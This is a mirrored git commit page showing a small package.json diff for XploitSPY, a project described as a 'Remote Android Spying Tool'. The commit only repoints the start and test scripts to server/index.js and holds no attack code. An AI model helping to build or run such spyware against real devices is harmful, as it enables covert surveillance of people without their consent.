mirror of
https://github.com/XploitWizer-Community/XploitSPY.git
synced 2024-12-29 09:05:29 +08:00
fixed bug
This commit is contained in:
parent
5257f9a0b7
commit
9f1c906998
@ -4,8 +4,8 @@
|
|||||||
"description": "XploitSPY - Remote Android Spying Tool",
|
"description": "XploitSPY - Remote Android Spying Tool",
|
||||||
"main": "index.js",
|
"main": "index.js",
|
||||||
"scripts": {
|
"scripts": {
|
||||||
"start": "node index.js",
|
"start": "node server/index.js",
|
||||||
"test": "node index.js"
|
"test": "node server/index.js"
|
||||||
},
|
},
|
||||||
"author": "XploitWizer",
|
"author": "XploitWizer",
|
||||||
"license": "ISC",
|
"license": "ISC",
|
||||||
|
Loading…
Reference in New Issue
Block a user